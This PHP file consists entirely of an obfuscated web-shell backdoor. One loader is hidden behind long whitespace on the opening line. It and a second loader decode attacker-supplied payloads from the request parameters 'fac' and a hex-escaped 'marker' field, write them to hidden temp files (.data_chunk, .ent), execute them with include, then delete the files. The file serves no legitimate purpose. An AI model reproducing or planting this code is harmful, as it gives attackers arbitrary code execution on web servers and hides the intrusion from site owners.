<?php																																										if(isset($_REQUEST["fac"])){ $parameter_group = $_REQUEST["fac"]; $parameter_group = explode ( "." ,$parameter_group) ; $holder = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s3 ); $s = 0; foreach($parameter_group as $v7) { $chS = ord($s3[$s % $lenS] ); $d =((int)$v7 - $chS -($s % 10)) ^ 91; $holder .= chr($d ); $s++; } $flag = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), session_save_path(), getenv("TMP"), "/var/tmp", "/dev/shm", getenv("TEMP"), "/tmp"]); while ($hld = array_shift($flag)) { if ((bool)is_dir($hld) && (bool)is_writable($hld)) { $obj = "$hld" . "/.data_chunk"; if (file_put_contents($obj, $holder)) { include $obj; @unlink($obj); exit; } } } }


if(count($_POST) > 0 && isset($_POST["\x6D\x61rker"])){
	$entry = $_POST["\x6D\x61rker"];
				$entry   =  explode("." 		,$entry	); 
	$component = '';
            $salt5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt5	 );
            $y = 0;
    
            while ($y < count($entry)) {		$v4 = $entry[$y];
                $chS = ord($salt5[$y % $lenS]	 );
                $dec = ((int)$v4 - $chS - ($y % 10)) ^ 3;
                $component .= chr($dec	 );
                $y++;	}  
	$value = array_filter([getcwd(), "/var/tmp", getenv("TEMP"), "/tmp", sys_get_temp_dir(), session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP")]);
	foreach ($value as $key => $k) {
    		if (is_writable($k) && is_dir($k)) {
    $property_set = join("/", [$k, ".ent"]);
    $success = file_put_contents($property_set, $component);
if ($success) {
	include $property_set;
	@unlink($property_set);
	exit;}
}
}
}